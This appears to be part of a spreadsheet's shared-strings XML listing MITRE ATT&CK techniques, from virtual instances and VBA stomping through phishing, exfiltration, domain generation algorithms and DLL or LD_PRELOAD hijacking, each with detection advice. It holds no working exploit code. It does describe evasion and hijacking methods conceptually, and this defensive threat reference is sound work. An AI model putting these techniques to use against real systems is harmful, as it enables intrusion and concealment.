    <t>Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS.(Citation: MalwareTech VFS Nov 2014)
Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.(Citation: MalwareTech VFS Nov 2014)(Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system.(Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways.(Citation: Kaspersky Equation QA)</t>
  </si>
  <si>
    <t>T1564.006</t>
  </si>
  <si>
    <t>Run Virtual Instance</t>
  </si>
  <si>
    <t>Packet capture,Host network interface,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Consider monitoring for files and processes associated with running a virtual instance, such as binary files associated with common virtualization technologies (ex: VirtualBox, VMware, QEMU, Hyper-V). Consider monitoring for process command-line arguments that may be atypical for benign use of virtualization software. Usage of virtualization binaries or command-line arguments associated with running a headless (in the background with no UI) virtual instance may be especially suspect. Network adapter information may also be helpful in detecting the use of virtual instances.
If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. 
Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior.</t>
  </si>
  <si>
    <t>Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)
Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)</t>
  </si>
  <si>
    <t>T1564.007</t>
  </si>
  <si>
    <t>VBA Stomping</t>
  </si>
  <si>
    <t>Detection efforts should be placed finding differences between VBA source code and p-code.(Citation: Walmart Roberts Oct 2018) VBA code can be extracted from p-code before execution with tools such as the pcodedmp disassembler. The oletools toolkit leverages the pcodedmp disassembler to detect VBA stomping by comparing keywords present in the VBA source code and p-code.(Citation: pcodedmp Bontchev)(Citation: oletools toolkit)
If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the &lt;code&gt;PROJECT&lt;/code&gt; stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the &lt;code&gt;PROJECT&lt;/code&gt; stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020)</t>
  </si>
  <si>
    <t>Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)
MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a &lt;code&gt;PerformanceCache&lt;/code&gt; that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream)
An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the &lt;code&gt;_VBA_PROJECT&lt;/code&gt; stream and host MS Office application, the p-code will be executed, otherwise the benign VBA source code will be decompressed and recompiled to p-code, thus removing malicious p-code and potentially bypassing dynamic analysis.(Citation: Walmart Roberts Oct 2018)(Citation: FireEye VBA stomp Feb 2020)(Citation: pcodedmp Bontchev)</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis,File monitoring,Application logs</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.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</si>
  <si>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T1565.001</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>File monitoring,Application logs</t>
  </si>
  <si>
    <t>Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
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</si>
  <si>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T1565.002</t>
  </si>
  <si>
    <t>Transmitted Data Manipulation</t>
  </si>
  <si>
    <t>Packet capture,Network protocol analysis</t>
  </si>
  <si>
    <t xml:space="preserve">Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. </t>
  </si>
  <si>
    <t>Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
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</si>
  <si>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T1565.003</t>
  </si>
  <si>
    <t>Runtime Data Manipulation</t>
  </si>
  <si>
    <t>Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.</t>
  </si>
  <si>
    <t>Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001)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</si>
  <si>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T1566</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Web proxy,Email gateway,Mail server,Network intrusion detection system,Detonation chamber,SSL/TLS inspection,Anti-virus</t>
  </si>
  <si>
    <t>Linux,macOS,Windows,SaaS,Office 365</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect phishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because most common third-party services used for phishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware.
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Many possible detections of follow-on behavior may take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</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</si>
  <si>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or to gather credentials for use of [Valid Accounts](https://attack.mitre.org/techniques/T1078). Phishing may also be conducted via third-party services, like social media platforms.</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>File monitoring,Packet capture,Network intrusion detection system,Detonation chamber,Email gateway,Mail server</t>
  </si>
  <si>
    <t>Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.
Anti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>Spearphishing Link</t>
  </si>
  <si>
    <t>Packet capture,Web proxy,Email gateway,Detonation chamber,SSL/TLS inspection,DNS records,Mail server</t>
  </si>
  <si>
    <t>URL inspection within email (including expanding shortened links) can help detect links leading to known malicious sites. Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Because this technique usually involves user interaction on the endpoint, many of the possible detections take place once [User Execution](https://attack.mitre.org/techniques/T1204) occurs.</t>
  </si>
  <si>
    <t>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or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications  designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)</t>
  </si>
  <si>
    <t>T1566.003</t>
  </si>
  <si>
    <t>Spearphishing via Service</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Anti-virus,Web proxy</t>
  </si>
  <si>
    <t>Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. 
Anti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.</t>
  </si>
  <si>
    <t>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</si>
  <si>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T1567</t>
  </si>
  <si>
    <t>Exfiltration Over Web Service</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,SSL/TLS inspection</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</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</si>
  <si>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
Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection.</t>
  </si>
  <si>
    <t>T1567.001</t>
  </si>
  <si>
    <t>Exfiltration to Code Repository</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to code repositories. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.
Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. </t>
  </si>
  <si>
    <t>T1567.002</t>
  </si>
  <si>
    <t>Exfiltration to Cloud Storage</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet.
Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. </t>
  </si>
  <si>
    <t>T1568</t>
  </si>
  <si>
    <t>Dynamic Resolution</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Web logs,DNS records</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</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</si>
  <si>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
Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>Fast Flux DNS</t>
  </si>
  <si>
    <t>DNS records</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</t>
  </si>
  <si>
    <t>Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
The simplest, "single-flux" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.(Citation: Fast Flux - Welivesecurity)
In contrast, the "double-flux" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.</t>
  </si>
  <si>
    <t>T1568.002</t>
  </si>
  <si>
    <t>Domain Generation Algorithms</t>
  </si>
  <si>
    <t>DNS records,Netflow/Enclave netflow,Network device logs,Packet capture,Process use of network</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)</t>
  </si>
  <si>
    <t>Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
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
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t>
  </si>
  <si>
    <t>T1568.003</t>
  </si>
  <si>
    <t>DNS Calculation</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
One implementation of [DNS Calculation](https://attack.mitre.org/techniques/T1568/003) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.(Citation: Meyers Numbered Panda)(Citation: Moran 2014)(Citation: Rapid7G20Espionage)</t>
  </si>
  <si>
    <t>T1569</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services. Many services are set to run at boot, which can aid in achieving persistence ([Create or Modify System Process](https://attack.mitre.org/techniques/T1543)), but adversaries can also abuse services for one-time or temporary execution.</t>
  </si>
  <si>
    <t>T1569.001</t>
  </si>
  <si>
    <t>Launchctl</t>
  </si>
  <si>
    <t>KnockKnock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes.</t>
  </si>
  <si>
    <t>Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s and [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
Running a command from launchctl is as simple as &lt;code&gt;launchctl submit -l &lt;labelName&gt; -- /Path/to/thing/to/execute "arg" "arg" "arg"&lt;/code&gt;. Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.</t>
  </si>
  <si>
    <t>Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) or [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001). Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client.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t>
  </si>
  <si>
    <t xml:space="preserve">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 
There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) 
[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) 
Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. </t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>SSL/TLS inspection,Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)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</si>
  <si>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Adversaries may employ a known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t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>Symmetric Cryptography</t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.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</si>
  <si>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t>
  </si>
  <si>
    <t>T1573.002</t>
  </si>
  <si>
    <t>Asymmetric Cryptography</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Malware reverse engineering,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).</t>
  </si>
  <si>
    <t>T1574</t>
  </si>
  <si>
    <t>Hijack Execution Flow</t>
  </si>
  <si>
    <t>Environment variable,Loaded DLLs,Process command-line parameters,Process monitoring,File monitoring,DLL monitoring</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</si>
  <si>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
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Monitor for changes to environment variables, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so, abnormal process call trees). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.
Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are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including listing current service information. (Citation: Autoruns for Windows) Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution.
There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads.</t>
  </si>
  <si>
    <t>persistence,privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,DLL monitoring,File monitoring</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting)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 (Citation: Microsoft Security Advisory 2269637)
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. (Citation: Microsoft Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye DLL Search Order Hijacking)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t>
  </si>
  <si>
    <t>T1574.002</t>
  </si>
  <si>
    <t>DLL Side-Loading</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Process use of network</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one.  (Citation: FireEye DLL Side-Loading)
Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>T1574.004</t>
  </si>
  <si>
    <t>Dylib Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Objective-See's Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. </t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking ambiguous paths  used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead.  MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.
A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level.</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>T1574.006</t>
  </si>
  <si>
    <t>LD_PRELOAD</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or &lt;code&gt;/etc/ld.so.preload&lt;/code&gt; file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by &lt;code&gt;dlopen()&lt;/code&gt; and &lt;code&gt;mmap()&lt;/code&gt; respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.</t>
  </si>
